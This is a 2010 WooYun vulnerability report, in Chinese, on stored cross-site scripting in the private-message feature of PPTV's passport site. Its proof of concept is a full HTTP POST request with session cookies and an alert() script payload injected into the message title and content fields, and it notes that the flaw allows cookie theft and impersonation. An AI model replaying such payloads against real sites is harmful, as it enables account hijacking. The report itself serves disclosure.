当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0135

漏洞标题:pplive网站2处存储型跨站弱点

相关厂商:pplive

漏洞作者: Liscker

提交时间:2010-07-30 13:33

修复时间:2010-07-30 14:36

公开时间:2010-07-30 14:36

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-07-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

pplive网站2处存储型跨站弱点。

详细说明:

passport.pptv.com网站中的小纸条(站内信)功能存在跨站弱点。
标题、内容都可直接写入跨站代码并发送信件,虽然标题有字数限制,但可以通过自己提交post包绕过。
经过验证,如果直接在标题中添加跨站代码,受害者打开收件箱即触发跨站!
可窃取用户cookie并仿冒用户登录。

漏洞证明:

POST /addmessage.do HTTP/1.1
Accept: */*
Referer: http://passport.pptv.com/writemessage.do?
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
Host: passport.pptv.com
Content-Length: 157
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=app4~abcbBzsNKnEJd4WrC1HOs; dmt4574c0e597937=4%7C0; dm4574c0e597937=1%7C1280467956%7C0%7C%7C; PPKey=c2dsKhvDvQu2vkuxhw8OYdBaEjbeINm2singwpLwCO8NZo0%2Fh7SSpq2sX5i1B9KLePHVuwm%2BH4D3Qx2KGtG1XexyJX6LLo7Q8phnOkZgWwSMg%2B6OM0no5ycVBD7gcv1WL%2FIelyIVIGDfx%2FQ0Lm2GW5lhOOA%2Bmh5kSmwAIseyoILjQGXQKNTd7pMJMrZwAeU7d%2FB9X%2Fa9ci8%3D; PPName=cnfection$32ACFA6BA2CB46F39F3905112211C6D4; UDI=1$30$0$PP%E6%B8%B8%E6%B0%91$PP%E5%AE%9E%E4%B9%A0%E7%94%9F$201$%E7%9C%81%E4%BB%BD%C2%B7%E5%9F%8E%E5%B8%82$0$0$ppface.jpg$cnfection2%40qq.com$0%E5%88%86%E9%92%9F$2009%E5%B9%B412%E6%9C%8818%E6%97%A5$$$
temp=&receiver=test&title=<script>alert(/liscker/);</script>&content=<script>alert(/liscker/);</script>&submit=%E5%A5%BD%E4%BA%86%EF%BC%8C%E5%8F%91%E5%87%BA

修复方案:

过滤跨站关键字

版权声明:转载请注明来源 Liscker@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)